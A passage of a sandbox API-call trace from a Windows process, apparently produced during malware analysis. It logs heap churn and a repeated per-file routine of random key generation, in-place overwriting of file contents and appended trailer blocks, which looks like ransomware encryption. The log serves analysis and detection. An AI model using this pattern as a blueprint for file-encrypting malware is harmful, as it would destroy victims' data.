0x4f10000 [0076.523] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.523] GetProcessHeap () returned 0x4f10000 [0076.523] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.524] GetProcessHeap () returned 0x4f10000 [0076.524] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0076.525] GetProcessHeap () returned 0x4f10000 [0076.525] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.526] GetProcessHeap () returned 0x4f10000 [0076.526] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0076.526] SetFilePointerEx (in: hFile=0x76c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.526] WriteFile (in: hFile=0x76c, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0076.526] WriteFile (in: hFile=0x76c, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0076.526] GetProcessHeap () returned 0x4f10000 [0076.526] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0076.526] GetProcessHeap () returned 0x4f10000 [0076.526] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0076.526] GetProcessHeap () returned 0x4f10000 [0076.526] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0076.526] CloseHandle (hObject=0x76c) returned 1 [0076.528] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 10 [0076.528] SetFilePointerEx (in: hFile=0x770, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.528] ReadFile (in: hFile=0x770, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0076.528] SetFilePointerEx (in: hFile=0x770, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.528] GetProcessHeap () returned 0x4f10000 [0076.528] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0076.528] GetProcessHeap () returned 0x4f10000 [0076.528] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0076.528] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0076.528] GetProcessHeap () returned 0x4f10000 [0076.528] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0076.528] ReadFile (in: hFile=0x770, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.587] SetFilePointerEx (in: hFile=0x770, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.587] WriteFile (in: hFile=0x770, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.587] GetProcessHeap () returned 0x4f10000 [0076.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0076.587] GetProcessHeap () returned 0x4f10000 [0076.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.587] GetProcessHeap () returned 0x4f10000 [0076.587] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0076.587] GetProcessHeap () returned 0x4f10000 [0076.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.587] GetProcessHeap () returned 0x4f10000 [0076.587] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0076.587] GetProcessHeap () returned 0x4f10000 [0076.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.587] GetProcessHeap () returned 0x4f10000 [0076.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.587] GetProcessHeap () returned 0x4f10000 [0076.587] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.587] GetProcessHeap () returned 0x4f10000 [0076.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.588] GetProcessHeap () returned 0x4f10000 [0076.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0076.589] GetProcessHeap () returned 0x4f10000 [0076.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.590] GetProcessHeap () returned 0x4f10000 [0076.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0076.591] GetProcessHeap () returned 0x4f10000 [0076.592] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0076.592] GetProcessHeap () returned 0x4f10000 [0076.592] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.592] GetProcessHeap () returned 0x4f10000 [0076.592] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0076.592] SetFilePointerEx (in: hFile=0x770, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.592] WriteFile (in: hFile=0x770, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0076.592] WriteFile (in: hFile=0x770, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0076.592] GetProcessHeap () returned 0x4f10000 [0076.592] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0076.592] GetProcessHeap () returned 0x4f10000 [0076.592] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0076.592] GetProcessHeap () returned 0x4f10000 [0076.592] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0076.592] CloseHandle (hObject=0x770) returned 1 [0076.594] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 11 [0076.594] SetFilePointerEx (in: hFile=0x7c4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.594] ReadFile (in: hFile=0x7c4, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0076.594] SetFilePointerEx (in: hFile=0x7c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.594] GetProcessHeap () returned 0x4f10000 [0076.594] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0076.594] GetProcessHeap () returned 0x4f10000 [0076.594] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0076.594] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0076.594] GetProcessHeap () returned 0x4f10000 [0076.594] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0076.594] ReadFile (in: hFile=0x7c4, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x7eb, lpOverlapped=0x0) returned 1 [0076.619] SetFilePointerEx (in: hFile=0x7c4, liDistanceToMove=0xfffff815, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.619] WriteFile (in: hFile=0x7c4, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x7eb, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x7eb, lpOverlapped=0x0) returned 1 [0076.619] GetProcessHeap () returned 0x4f10000 [0076.619] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0076.619] GetProcessHeap () returned 0x4f10000 [0076.619] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.619] GetProcessHeap () returned 0x4f10000 [0076.619] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0076.619] GetProcessHeap () returned 0x4f10000 [0076.619] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.620] GetProcessHeap () returned 0x4f10000 [0076.620] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.620] GetProcessHeap () 